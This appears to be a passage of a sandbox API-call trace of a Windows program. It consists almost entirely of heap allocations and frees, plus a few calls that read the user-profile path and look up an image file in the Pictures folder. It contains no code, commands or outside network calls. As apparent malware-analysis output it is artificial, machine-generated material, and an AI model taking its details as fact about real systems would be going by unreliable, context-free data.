[0210.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0210.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0210.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0210.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0210.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0210.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a28 [0210.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0210.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0210.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0210.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0210.574] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa708 [0210.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa660 [0210.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0210.574] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0210.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0210.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0210.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0210.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0210.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0210.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0210.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0210.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0210.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0210.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b58 [0210.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0210.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0210.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0210.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ae8 [0210.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0210.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0210.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa780 [0210.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0210.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0210.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0210.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0210.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0210.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0210.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0210.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0210.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0210.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0210.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0210.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0210.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0210.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0210.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0210.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0210.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0210.576] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0210.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0210.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0210.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0210.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0210.577] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0210.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0210.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0210.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0210.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0210.577] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0210.577] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0210.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0210.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0210.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0210.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0210.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0210.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0210.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0210.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0210.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0210.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0210.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0210.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.578] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0210.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0210.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0210.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0210.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0210.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0210.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0210.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0210.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0210.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0210.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0210.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0210.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0210.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0210.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0210.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0210.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0210.580] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0210.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0210.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0210.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0210.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0210.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0210.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0210.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.581] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0210.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0210.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0210.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0210.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0210.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0210.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0210.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0210.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.582] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/ktNHTaW.bmp", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c9c1d90, ftCreationTime.dwHighDateTime=0x1d5d3cb, ftLastAccessTime.dwLowDateTime=0x534da710, ftLastAccessTime.dwHighDateTime=0x1d5c9b1, ftLastWriteTime.dwLowDateTime=0x534da710, ftLastWriteTime.dwHighDateTime=0x1d5c9b1, nFileSizeHigh=0x0, nFileSizeLow=0x18cc1, dwReserved0=0x0, dwReserved1=0x0, cFileName="ktNHTaW.bmp", cAlternateFileName="")) returned 0x9e1bf8 [0210.582] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0210.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 